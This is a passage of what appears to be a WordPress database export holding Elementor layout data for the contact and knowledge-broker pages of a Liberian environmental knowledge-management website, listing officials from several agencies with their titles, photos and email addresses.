href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23319,3385,'_wp_attached_file','2021/01/carlon.jpg'),(23320,3385,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:18:\"2021/01/carlon.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"carlon-300x279.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"carlon-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23321,3386,'_elementor_edit_mode','builder'),(23322,3386,'_elementor_template_type','wp-page'),(23323,3386,'_elementor_version','3.0.16'),(23324,3386,'_wp_page_template','default'),(23325,3386,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\nManager, ESIA\\nDepartment of Compliance and Enforcement\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a 